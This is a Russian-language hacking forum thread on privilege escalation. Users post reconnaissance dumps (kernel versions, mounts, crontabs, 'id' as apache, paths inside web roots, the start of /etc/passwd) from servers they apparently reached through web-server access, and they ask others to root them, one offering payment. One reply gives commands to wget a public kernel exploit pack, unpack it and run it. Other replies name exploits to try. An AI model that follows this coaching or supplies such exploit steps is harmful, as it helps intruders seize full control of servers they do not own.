Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    ребят ну вы сначала первый пост прочитайте,а только уже потом задавайте вопросы.
     
  2. antiaudomain

    antiaudomain Banned

    Joined:
    19 May 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Помогите, чем сможете, люди добрые! :)
    Сразу скажу, что пробовал glibc и сплойт от acid bitchez, ничего не вышло, к сожалению.
     
  3. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    antiaudomain, какой именно glibc пробовал? :)

    Там новые версии сплоитов есть уже, на рдоте глянь.
    На всякий случай - вывод:

    UPD - сразу не заметил

    1 - wget http://grsecurity.net/~spender/exploits/enlightenment.tgz
    2 - tar xvfz enlightenment.tgz
    3 - запускаем интуитивно понятный скрипт
    4 - PROFIT
     
    1 person likes this.
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    antiaudomain, пробуй глибц
    Pirotexnik, не справится, на версию ядра посмотри
     
    _________________________
    3 people like this.
  5. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Code:
    [COLOR=Black]$ uname -a[/COLOR]
    FreeBSD qwerty 6.2-RELEASE FreeBSD 6.2-RELEASE #1: Fri Sep 18 12:05:20 MSD 2009     root@qwerty:/usr/obj/usr/src/sys/qwerty  i386
    
    [COLOR=Black]$ ls -la /boot[/COLOR]
    total 1716
    drwxr-xr-x   9 root  wheel    1024 Sep 18  2009 .
    drwxr-xr-x  30 root  wheel    1024 Nov 28  2010 ..
    drwxr-xr-x   2 root  wheel    9728 Jun 25  2007 GENERIC
    -r--r--r--   1 root  wheel    7638 Jan 12  2007 beastie.4th
    -rw-r--r--   1 root  wheel    8192 Jun 26  2007 boot
    -rw-r--r--   1 root  wheel    8192 Jun 25  2007 boot.bak
    -r--r--r--   1 root  wheel     512 Jan 12  2007 boot0
    -r--r--r--   1 root  wheel     512 Jan 12  2007 boot0sio
    -r--r--r--   1 root  wheel     512 Jan 12  2007 boot1
    -r--r--r--   1 root  wheel    7680 Jan 12  2007 boot2
    -r--r--r--   1 root  wheel    1200 Jan 12  2007 cdboot
    drwxr-xr-x   2 root  wheel     512 Jun 25  2007 defaults
    -r--r--r--   1 root  wheel    1741 Jan 12  2007 device.hints
    -r--r--r--   1 root  wheel    2249 Jan 12  2007 frames.4th
    drwxr-xr-x   2 root  wheel    9728 Sep 18  2009 kernel
    drwxr-xr-x   2 root  wheel    9728 Sep 18  2009 kernel.good
    drwxr-xr-x   2 root  wheel    9728 Jun 26  2007 kernel.old
    drwxr-xr-x   2 root  wheel    9728 Sep 18  2009 kernel.old.old
    -rw-r--r--   1 root  wheel  212992 Jun 26  2007 loader
    -r--r--r--   1 root  wheel    7772 Jan 12  2007 loader.4th
    -rw-r--r--   1 root  wheel  212992 Jun 25  2007 loader.bak
    -rw-r--r--   1 root  wheel       0 Jun 25  2007 loader.conf
    -r--r--r--   1 root  wheel   15219 Jan 12  2007 loader.help
    -r--r--r--   1 root  wheel     389 Jan 12  2007 loader.rc
    -r--r--r--   1 root  wheel     512 Jan 12  2007 mbr
    drwxr-xr-x   2 root  wheel     512 Jan 12  2007 modules
    -r--r--r--   1 root  wheel  219136 Jan 12  2007 pxeboot
    -r--r--r--   1 root  wheel     692 Jan 12  2007 screen.4th
    -r--r--r--   1 root  wheel   36440 Jan 12  2007 support.4th
    
    [COLOR=Black]$ ls -la --full-time /lib/lib*[/COLOR]
    
    [COLOR=Black]$ mount[/COLOR]
    /dev/da0s1a on / (ufs, local)
    devfs on /dev (devfs, local)
    /dev/da0s1g on /hsphere (ufs, local, with quotas, soft-updates)
    /dev/da0s1f on /tmp (ufs, local, soft-updates)
    /dev/da0s1d on /usr (ufs, local, soft-updates)
    /dev/da0s1e on /var (ufs, local, soft-updates)
    procfs on /proc (procfs, local)
    
    [COLOR=Black]$ df -h[/COLOR]
    Filesystem     Size    Used   Avail Capacity  Mounted on
    /dev/da0s1a    989M    267M    643M    29%    /
    devfs          1.0K    1.0K      0B   100%    /dev
    /dev/da0s1g    676G    179G    443G    29%    /hsphere
    /dev/da0s1f    1.9G    1.6G    137M    92%    /tmp
    /dev/da0s1d    9.7G    3.9G    5.0G    43%    /usr
    /dev/da0s1e     29G     12G     14G    47%    /var
    procfs         4.0K    4.0K      0B   100%    /proc
    
    [COLOR=Black]$ cat /etc/issue[/COLOR]
    
    [COLOR=Black]$ cat /etc/crontab[/COLOR]
    # /etc/crontab - root's crontab for FreeBSD
    #
    # $FreeBSD: src/etc/crontab,v 1.32 2002/11/22 16:13:39 tom Exp $
    #
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
    HOME=/var/log
    #
    #minute	hour	mday	month	wday	who	command
    #
    */5	*	*	*	*	root	/usr/libexec/atrun
    #
    # Save some entropy so that /dev/random can re-seed on boot.
    */11	*	*	*	*	operator /usr/libexec/save-entropy
    #
    # Rotate log files every hour, if necessary.
    0	*	*	*	*	root	newsyslog
    #
    # Perform daily/weekly/monthly maintenance.
    1	3	*	*	*	root	periodic daily
    15	4	*	*	6	root	periodic weekly
    30	5	1	*	*	root	periodic monthly
    #
    # Adjust the time zone if the CMOS clock keeps local time, as opposed to
    # UTC time.  See adjkerntz(8) for details.
    1,31	0-5	*	*	*	root	adjkerntz -a
    
    [COLOR=Black]$ cat /proc/version[/COLOR]
    
    [COLOR=Black]$ cat /proc/sys/vm/mmap_min_addr[/COLOR]
    
    [COLOR=Black]$ pwd[/COLOR]
    /hsphere/local/home/*/*
    
    [COLOR=Black]$ ls -la /usr/bin/staprun[/COLOR]
    Пока ничего не пробовал, т.к. не дома.
     
  6. BuyTRAFFIK

    BuyTRAFFIK Banned

    Joined:
    15 May 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    -5
    Что пойдет?
     
  7. moloon

    moloon New Member

    Joined:
    22 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Помогите порутать. затраты времени компенсирую.
    ICQ - 614349452


    $ uname -a
    Linux 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux

    $ ls -la /boot
    total 13754
    drwxr-xr-x 4 root root 1024 Jan 24 2012 .
    drwxr-xr-x 24 root root 4096 Jan 24 2012 ..
    -rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac
    -rw-r--r-- 1 root root 163 Jan 10 2012 .vmlinuz-2.6.18-274.17.1.el5.hmac
    -rw-r--r-- 1 root root 1242340 Apr 2 2010 System.map-2.6.18-194.el5
    -rw-r--r-- 1 root root 1270032 Jan 10 2012 System.map-2.6.18-274.17.1.el5
    -rw-r--r-- 1 root root 66887 Apr 2 2010 config-2.6.18-194.el5
    -rw-r--r-- 1 root root 67614 Jan 10 2012 config-2.6.18-274.17.1.el5
    drwxr-xr-x 2 root root 1024 Jan 24 2012 grub
    -rw------- 1 root root 3440295 Dec 21 2011 initrd-2.6.18-194.el5.img
    -rw------- 1 root root 3518527 Jan 24 2012 initrd-2.6.18-274.17.1.el5.img
    drwx------ 2 root root 12288 Dec 21 2011 lost+found
    -rw-r--r-- 1 root root 80032 Mar 16 2009 message
    -rw-r--r-- 1 root root 112656 Apr 2 2010 symvers-2.6.18-194.el5.gz
    -rw-r--r-- 1 root root 116197 Jan 10 2012 symvers-2.6.18-274.17.1.el5.gz
    -rw-r--r-- 1 root root 1953660 Apr 2 2010 vmlinuz-2.6.18-194.el5
    -rw-r--r-- 1 root root 2107772 Jan 10 2012 vmlinuz-2.6.18-274.17.1.el5


    $ ls -la --full-time /lib/lib*
    -rwxr-xr-x 1 root root 7664 2011-11-28 09:28:47.000000000 -0800 /lib/libBrokenLocale-2.5.so
    lrwxrwxrwx 1 root root 22 2012-01-24 00:17:37.000000000 -0800 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x 1 root root 16704 2011-11-28 09:28:47.000000000 -0800 /lib/libSegFault.so
    -rwxr-xr-x 1 root root 14128 2011-11-28 09:28:47.000000000 -0800 /lib/libanl-2.5.so
    lrwxrwxrwx 1 root root 13 2012-01-24 00:17:37.000000000 -0800 /lib/libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx 1 root root 17 2012-01-24 00:18:07.000000000 -0800 /lib/libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x 1 root root 95740 2011-03-05 17:22:55.000000000 -0800 /lib/libaudit.so.0.0.0
    lrwxrwxrwx 1 root root 19 2012-01-24 00:18:07.000000000 -0800 /lib/libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x 1 root root 54832 2011-03-05 17:22:55.000000000 -0800 /lib/libauparse.so.0.0.0
    lrwxrwxrwx 1 root root 15 2012-01-24 00:18:11.000000000 -0800 /lib/libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x 1 root root 36708 2011-07-21 22:04:15.000000000 -0700 /lib/libblkid.so.1.0
    -rwxr-xr-x 1 root root 1693812 2011-11-28 09:28:47.000000000 -0800 /lib/libc-2.5.so
    lrwxrwxrwx 1 root root 11 2012-01-24 00:17:37.000000000 -0800 /lib/libc.so.6 -> libc-2.5.so
    lrwxrwxrwx 1 root root 14 2011-12-21 16:41:14.000000000 -0800 /lib/libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x 1 root root 11560 2007-03-14 11:15:10.000000000 -0700 /lib/libcap.so.1.10
    -rwxr-xr-x 1 root root 191708 2011-11-28 09:28:47.000000000 -0800 /lib/libcidn-2.5.so
    lrwxrwxrwx 1 root root 14 2012-01-24 00:17:37.000000000 -0800 /lib/libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx 1 root root 17 2012-01-24 00:18:11.000000000 -0800 /lib/libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x 1 root root 6364 2011-07-21 22:04:15.000000000 -0700 /lib/libcom_err.so.2.1
    -rwxr-xr-x 1 root root 45432 2011-11-28 09:28:47.000000000 -0800 /lib/libcrypt-2.5.so
    lrwxrwxrwx 1 root root 15 2012-01-24 00:17:37.000000000 -0800 /lib/libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x 1 root root 1296512 2012-04-24 14:28:01.000000000 -0700 /lib/libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root 19 2012-04-26 20:26:01.000000000 -0700 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x 1 root root 1010204 2010-07-12 09:11:02.000000000 -0700 /lib/libdb-4.3.so
    lrwxrwxrwx 1 root root 18 2012-01-24 00:19:04.000000000 -0800 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x 1 root root 253392 2011-08-11 10:33:53.000000000 -0700 /lib/libdbus-1.so.3.4.0
    -r--r--r-- 1 root root 42988 2011-07-21 22:43:06.000000000 -0700 /lib/libdevmapper-event.a
    lrwxrwxrwx 1 root root 26 2012-01-24 00:18:10.000000000 -0800 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x 1 root root 17548 2011-07-21 22:43:10.000000000 -0700 /lib/libdevmapper-event.so.1.02
    -r--r--r-- 1 root root 469522 2011-07-21 22:43:01.000000000 -0700 /lib/libdevmapper.a
    lrwxrwxrwx 1 root root 20 2012-01-24 00:18:10.000000000 -0800 /lib/libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x 1 root root 151964 2011-07-21 22:43:10.000000000 -0700 /lib/libdevmapper.so.1.02
    -rwxr-xr-x 1 root root 20668 2011-11-28 09:28:47.000000000 -0800 /lib/libdl-2.5.so
    lrwxrwxrwx 1 root root 12 2012-01-24 00:17:37.000000000 -0800 /lib/libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx 1 root root 13 2012-01-24 00:18:11.000000000 -0800 /lib/libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x 1 root root 20192 2011-07-21 22:04:15.000000000 -0700 /lib/libe2p.so.2.3
    lrwxrwxrwx 1 root root 17 2012-01-24 00:18:11.000000000 -0800 /lib/libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x 1 root root 133184 2010-09-07 08:37:44.000000000 -0700 /lib/libexpat.so.0.5.0
    lrwxrwxrwx 1 root root 16 2012-01-24 00:18:11.000000000 -0800 /lib/libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x 1 root root 113860 2011-07-21 22:04:15.000000000 -0700 /lib/libext2fs.so.2.4
    -rwxr-xr-x 1 root root 45192 2012-02-22 02:36:07.000000000 -0800 /lib/libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root 28 2012-03-15 17:51:50.000000000 -0700 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root 23 2011-12-21 16:40:55.000000000 -0800 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 644472 2009-03-24 18:52:17.000000000 -0700 /lib/libglib-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2011-12-21 16:40:55.000000000 -0800 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 11396 2009-03-24 18:52:17.000000000 -0700 /lib/libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2011-12-21 16:40:55.000000000 -0800 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 259128 2009-03-24 18:52:17.000000000 -0700 /lib/libgobject-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2011-12-21 16:40:55.000000000 -0800 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 14660 2009-03-24 18:52:17.000000000 -0700 /lib/libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 27964 2007-03-14 20:26:22.000000000 -0700 /lib/libiw.so.28
    -rwxr-xr-x 1 root root 6404 2007-01-05 23:57:38.000000000 -0800 /lib/libkeyutils-1.2.so
    lrwxrwxrwx 1 root root 18 2011-12-21 16:41:14.000000000 -0800 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
    -rwxr-xr-x 1 root root 216544 2011-11-28 09:28:47.000000000 -0800 /lib/libm-2.5.so
    lrwxrwxrwx 1 root root 11 2012-01-24 00:17:37.000000000 -0800 /lib/libm.so.6 -> libm-2.5.so
    -rwxr-xr-x 1 root root 109740 2011-11-28 09:28:47.000000000 -0800 /lib/libnsl-2.5.so
    lrwxrwxrwx 1 root root 13 2012-01-24 00:17:37.000000000 -0800 /lib/libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x 1 root root 36416 2011-11-28 09:28:47.000000000 -0800 /lib/libnss_compat-2.5.so
    lrwxrwxrwx 1 root root 20 2012-01-24 00:17:37.000000000 -0800 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x 1 root root 825028 2010-05-13 04:02:40.000000000 -0700 /lib/libnss_db-2.2.so
    lrwxrwxrwx 1 root root 16 2012-01-24 00:18:15.000000000 -0800 /lib/libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x 1 root root 21948 2011-11-28 09:28:47.000000000 -0800 /lib/libnss_dns-2.5.so
    lrwxrwxrwx 1 root root 17 2012-01-24 00:17:37.000000000 -0800 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x 1 root root 50848 2011-11-28 09:28:47.000000000 -0800 /lib/libnss_files-2.5.so
    lrwxrwxrwx 1 root root 19 2012-01-24 00:17:37.000000000 -0800 /lib/libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x 1 root root 22764 2011-11-28 09:28:47.000000000 -0800 /lib/libnss_hesiod-2.5.so
    lrwxrwxrwx 1 root root 20 2012-01-24 00:17:37.000000000 -0800 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x 1 root root 3208544 2011-10-31 06:18:04.000000000 -0700 /lib/libnss_ldap-2.5.so
    lrwxrwxrwx 1 root root 18 2012-01-24 00:19:26.000000000 -0800 /lib/libnss_ldap.so.2 -> libnss_ldap-2.5.so
    -rwxr-xr-x 1 root root 46536 2011-11-28 09:28:48.000000000 -0800 /lib/libnss_nis-2.5.so
    lrwxrwxrwx 1 root root 17 2012-01-24 00:17:37.000000000 -0800 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x 1 root root 55804 2011-11-28 09:28:48.000000000 -0800 /lib/libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root 21 2012-01-24 00:17:37.000000000 -0800 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root 16 2012-01-24 00:19:01.000000000 -0800 /lib/libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x 1 root root 43020 2010-11-01 14:32:19.000000000 -0700 /lib/libpam.so.0.81.5
    lrwxrwxrwx 1 root root 21 2012-01-24 00:19:01.000000000 -0800 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x 1 root root 8624 2010-11-01 14:32:19.000000000 -0700 /lib/libpam_misc.so.0.81.2
    lrwxrwxrwx 1 root root 17 2012-01-24 00:19:01.000000000 -0800 /lib/libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x 1 root root 9868 2010-11-01 14:32:19.000000000 -0700 /lib/libpamc.so.0.81.0
    -rwxr-xr-x 1 root root 137908 2011-11-28 09:28:48.000000000 -0800 /lib/libpthread-2.5.so
    lrwxrwxrwx 1 root root 17 2012-01-24 00:17:37.000000000 -0800 /lib/libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x 1 root root 80636 2011-11-28 09:28:48.000000000 -0800 /lib/libresolv-2.5.so
    lrwxrwxrwx 1 root root 16 2012-01-24 00:17:37.000000000 -0800 /lib/libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x 1 root root 48156 2011-11-28 09:28:48.000000000 -0800 /lib/librt-2.5.so
    lrwxrwxrwx 1 root root 12 2012-01-24 00:17:37.000000000 -0800 /lib/librt.so.1 -> librt-2.5.so
    -rwxr-xr-x 1 root root 91892 2011-03-05 20:51:56.000000000 -0800 /lib/libselinux.so.1
    -rwxr-xr-x 1 root root 243928 2010-03-31 01:26:18.000000000 -0700 /lib/libsepol.so.1
    lrwxrwxrwx 1 root root 12 2012-01-24 00:18:11.000000000 -0800 /lib/libss.so.2 -> libss.so.2.0
    -rwxr-xr-x 1 root root 19008 2011-07-21 22:04:15.000000000 -0700 /lib/libss.so.2.0
    -rwxr-xr-x 1 root root 291436 2012-04-24 14:28:01.000000000 -0700 /lib/libssl.so.0.9.8e
    lrwxrwxrwx 1 root root 16 2012-04-26 20:26:01.000000000 -0700 /lib/libssl.so.6 -> libssl.so.0.9.8e
    lrwxrwxrwx 1 root root 19 2011-12-21 16:41:32.000000000 -0800 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root 11636 2007-01-06 05:01:17.000000000 -0800 /lib/libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root 33852 2011-11-28 09:28:48.000000000 -0800 /lib/libthread_db-1.0.so
    lrwxrwxrwx 1 root root 19 2012-01-24 00:17:37.000000000 -0800 /lib/libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x 1 root root 13492 2011-11-28 09:28:48.000000000 -0800 /lib/libutil-2.5.so
    lrwxrwxrwx 1 root root 14 2012-01-24 00:17:37.000000000 -0800 /lib/libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx 1 root root 14 2012-01-24 00:18:11.000000000 -0800 /lib/libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x 1 root root 14472 2011-07-21 22:04:15.000000000 -0700 /lib/libuuid.so.1.2
    lrwxrwxrwx 1 root root 22 2012-01-24 00:18:13.000000000 -0800 /lib/libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x 1 root root 37032 2011-11-14 02:43:31.000000000 -0800 /lib/libvolume_id.so.0.66.0
    lrwxrwxrwx 1 root root 16 2011-12-21 16:41:27.000000000 -0800 /lib/libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x 1 root root 31344 2009-09-21 15:37:30.000000000 -0700 /lib/libwrap.so.0.7.6
    lrwxrwxrwx 1 root root 13 2012-04-26 20:27:00.000000000 -0700 /lib/libz.so -> libz.so.1.2.3
    lrwxrwxrwx 1 root root 13 2012-01-24 00:18:07.000000000 -0800 /lib/libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x 1 root root 75120 2011-05-11 03:57:17.000000000 -0700 /lib/libz.so.1.2.3

    $ mount
    /dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/sda1 on /boot type ext3 (rw)
    tmpfs on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)

    $ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/mapper/VolGroup00-LogVol00
    886G 630G 210G 76% /
    /dev/sda1 99M 20M 75M 21% /boot
    tmpfs 7.9G 0 7.9G 0% /dev/shm

    $ cat /etc/issue
    CentOS release 5.7 (Final)
    Kernel \r on an \m


    $ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly


    $ cat /proc/version
    Linux version 2.6.18-194.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Fri Apr 2 14:58:14 EDT 2010


    $ cat /proc/sys/vm/mmap_min_addr

    $ pwd
    /var/www/html/images
     
  8. Red Virus

    Red Virus New Member

    Joined:
    11 Aug 2008
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    В рутанье 0 полный но есть серв

    $ uname -a

    FreeBSD gес 8.2-STABLE FreeBSD 8.2-STABLE #0: Fri Mar 18 12:44:18 UTC 2011 root@gec:/usr/obj/usr/src/sys/MYKERNEL amd64


    $ ls -lha - /usr/local/etc/

    Code:
    total 404  
    drwxr-xr-x  18 root  wheel   1.0K May 29  2012 .  
    drwxr-xr-x  13 root  wheel   512B Mar 18  2011 .. 
    -r--r--r--   1 root  wheel   588B Mar 18  2011 GeoIP.conf  
    -r--r--r--   1 root  wheel   588B Mar 18  2011 GeoIP.conf.default  drwxr-xr-x   2 root  wheel   512B Mar 18  2011 bash_completion.d  
    drwxr-xr-x   2 root  wheel   512B Mar 18  2011 devd 
    drwxr-xr-x   4 root  wheel   512B Mar 18  2011 fonts  
    drwxr-xr-x   2 root  wheel   512B Mar 18  2011 man.d  
    drwxr-xr-x   2 root  wheel   512B Mar 18  2011 mc  
    drwxr-xr-x   6 root  wheel   512B Mar 22  2011 munin  
    -rw-r--r--   1 root  wheel   1.5K Oct 18 18:10 my.cnf  
    drwxrwxrwx   2 root  wheel   512B Oct 20 20:15 nginx  
    drwxr-xr-x   2 root  wheel   512B Apr 11  2011 openldap  
    drwxr-xr-x   2 root  wheel   512B Mar 18  2011 pam.d  
    drwxr-xr-x   2 root  wheel   512B Mar 22  2011 pango  drwxrwxrwx   2 root  wheel   512B Mar 18  2011 php  -rwxrwxrwx   1 sten  wheel   5.2K Oct 23 12:17 php-fpm.conf  -r--r--r--   1 root  wheel   5.1K Mar 20  2011 php-fpm.conf.sample  -r--r--r--   1 root  wheel    47B Mar 20  2011 php.conf  
    -rwxrwxrwx   1 root  wheel   6.8K Jul 15 20:59 php.ini  
    -r--r--r--   1 root  wheel    45K Mar 20  2011 php.ini-dist  
    -r--r--r--   1 root  wheel    48K Mar 20  2011 php.ini-recommended  
    drwxr-xr-x   2 root  wheel   512B Apr 11  2011 rc.d  
    -r--r--r--   1 root  wheel   1.7K May 29  2012 rssh.conf.dist  drwx------   2 root  wheel   512B Aug  7  2011 samba34  
    drwxr-xr-x   2 root  wheel   512B May 29  2012 scponly 
     -rw-r--r--   1 root  wheel   3.2K Mar 18  2011 screenrc  
    -r--r--r--   1 root  wheel   1.4K Mar 18  2011 slsh.rc  
    -r--r--r--   1 root  wheel    10K Apr 11  2011 smb.conf  
    -r--r--r--   1 root  wheel    10K Apr 11  2011 smb.conf.sample  drwxr-xr-x   2 root  wheel   512B Mar 24  2011 snmp  
    -r--r--r--   1 root  wheel   4.4K Mar 20  2011 wgetrc.sample  
    -r--r--r--   1 root  wheel   339B Mar 18  2011 xml2Conf.sh  
    -r--r--r--   1 root  wheel   232B Mar 18  2011 xsltConf.sh  
    drwxr-xr-x   2 root  wheel   512B Mar 24  2011 zabbix

    Можно ли чтото зделать ?
     
    #448 Red Virus, 18 Dec 2012
    Last edited: 18 Dec 2012
  9. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Собственно вот: (в 1 пост не влезло!!!)

    Code:
    ================================================[b][COLOR=Red]uname -a[/b][/COLOR]================================================
    Linux billing 2.6.31.14-desktop-1mnb #1 SMP Wed Nov 24 10:42:07 EST 2010 x86_64 Intel(R) Core(TM)2 Quad CPU    Q8200  @ 2.33GHz GNU/Linux
    ================================================[b][COLOR=Red]mount[/b][/COLOR]================================================
    /dev/sdc5 on / type ext4 (rw,relatime)
    none on /proc type proc (rw)
    none on /tmp type tmpfs (rw)
    /dev/md0 on /var/lib/mysql type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /proc on /var/lib/named/proc type none (ro,bind)
    ================================================[b][COLOR=Red]df -h[/b][/COLOR]================================================
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/sdc5             908G  314G  548G  37% /
    none                  1.9G  238M  1.7G  13% /tmp
    /dev/md0              917G  284G  587G  33% /var/lib/mysql
    ================================================[b][COLOR=Red]ls -la /boot[/b][/COLOR]================================================
    total 23352
    drwxr-xr-x  3 root root    4096 Dec  2 11:15 .
    drwxr-xr-x 24 root adm     4096 Dec  2 12:57 ..
    lrwxrwxrwx  1 root root      33 Jul 25 20:01 System.map -> System.map-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root 1626967 Nov 24  2010 System.map-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root 1625850 Oct 23  2009 System.map-2.6.31.5-desktop-1mnb
    -rw-r--r--  1 root root     440 Apr 22  2010 boot.backup.sdc
    lrwxrwxrwx  1 root root      29 Dec  2 11:15 config -> config-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root  102256 Nov 24  2010 config-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root  102289 Oct 23  2009 config-2.6.31.5-desktop-1mnb
    -rwxr-xr-x  1 root root  633344 Apr 22  2010 gfxmenu
    drwxr-xr-x  2 root root    4096 Jul 25 13:09 grub
    -rw-------  1 root root 6978929 Jul 25 12:55 initrd-2.6.31.14-desktop-1mnb.img
    -rw-------  1 root root 7210276 Apr 22  2010 initrd-2.6.31.5-desktop-1mnb.img
    lrwxrwxrwx  1 root root      33 Jul 25 12:55 initrd-desktop.img -> initrd-2.6.31.14-desktop-1mnb.img
    lrwxrwxrwx  1 root root      33 Jul 25 12:55 initrd.img -> initrd-2.6.31.14-desktop-1mnb.img
    lrwxrwxrwx  1 root root      37 Dec  2 11:15 kernel.h -> /boot/kernel.h-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root    1493 Dec  2 11:15 kernel.h-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root    1493 Jun  1  2012 kernel.h-2.6.31.5-desktop-1mnb
    -rw-r--r--  1 root root  170847 Nov 24  2010 symvers-2.6.31.14-desktop-1mnb.gz
    -rw-r--r--  1 root root  171048 Oct 23  2009 symvers-2.6.31.5-desktop-1mnb.gz
    lrwxrwxrwx  1 root root      30 Jul 25 12:55 vmlinuz -> vmlinuz-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root 2904256 Nov 24  2010 vmlinuz-2.6.31.14-desktop-1mnb
    -rw-r--r--  1 root root 2345968 Oct 23  2009 vmlinuz-2.6.31.5-desktop-1mnb
    lrwxrwxrwx  1 root root      30 Jul 25 12:55 vmlinuz-desktop -> vmlinuz-2.6.31.14-desktop-1mnb
    ================================================[b][COLOR=Red]cat /proc/version[/b][/COLOR]================================================
    Linux version 2.6.31.14-desktop-1mnb ([email protected]) (gcc version 4.4.1 (GCC) ) #1 SMP Wed Nov 24 10:42:07 EST 2010
    ================================================[b][COLOR=Red]pwd[/b][/COLOR]================================================
    /var/www/billinfo/18/admin/users_reports
    ================================================[b][COLOR=Red]id[/b][/COLOR]================================================
    uid=75(apache) gid=10004(webusers) groups=10004(webusers)
    ================================================[b][COLOR=Red]whoami[/b][/COLOR]================================================
    apache
    ================================================[b][COLOR=Red]cat /etc/passwd[/b][/COLOR]================================================
    root:x:0:0:root:/root:/bin/bash
